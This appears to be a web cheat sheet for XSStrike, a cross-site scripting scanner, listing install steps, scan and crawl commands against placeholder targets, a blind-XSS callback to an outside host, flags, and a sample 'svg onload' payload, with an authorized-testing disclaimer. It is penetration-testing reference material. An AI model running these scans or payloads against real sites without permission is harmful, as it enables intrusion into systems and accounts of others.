CyberCheatsheets

XSStrike Cheat Sheet

Advanced XSS detection with context analysis, fuzzing, and WAF-aware payload generation.

Web Application Securityfuzzingwaf-bypassxssUpdated 2026-06-02

Overview

XSStrike analyzes reflection context (HTML, attribute, JS) and generates tailored XSS payloads with optional crawling and blind XSS hooks. Use when Dalfox/manual testing needs deeper context-aware fuzzing on authorized endpoints.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
pip install -r requirements.txt
python xsstrike.py -h

Essential commands

Single URL crawl + scan

python xsstrike.py -u "https://target.example/search?q=test"

Non-interactive fuzz one URL

python xsstrike.py -u "https://target.example/page?name=test" --skip-dom

POST request

python xsstrike.py -u "https://target.example/login" --data "user=admin&pass=x"

Common workflows

Crawl site and hunt XSS —

python xsstrike.py -u "https://target.example/" --crawl -l 2
python xsstrike.py -u "https://target.example/search?q=1" --fuzzer

Blind XSS —

python xsstrike.py -u "https://target.example/contact" --blind "https://your-callback.example/hit"

From Burp request (copy as curl, or use --headers) —

python xsstrike.py -u "https://target.example/api"
--headers "Cookie: session=abc\nAuthorization: Bearer token"

Console payload generation only —

python xsstrike.py --seeds '"><svg/onload=alert(1)>'

Flags reference

-u URL

Target URL

--data

POST data

--headers

Extra headers (newline-separated)

--crawl

Crawl from URL

-l DEPTH

Crawl depth

--fuzzer

Fuzzing mode

--skip-dom

Skip DOM XSS checks

--blind URL

Blind XSS callback

--skip

Skip confirmation prompts

--proxy

HTTP proxy

--timeout

Request timeout

--threads

Thread count

--seeds

Custom payload seeds

Tips

  • Run through Burp proxy by setting environment or patching --proxy http://127.0.0.1:8080 in requests if supported in your fork.
  • --crawl can be noisy; limit depth (-l) and scope host in program rules.
  • Compare with Dalfox for speed; use XSStrike for stubborn filtered reflections.
  • Always validate executed XSS in browser with your session context (CSP, cookies).

References

Ähnliche Cheat Sheets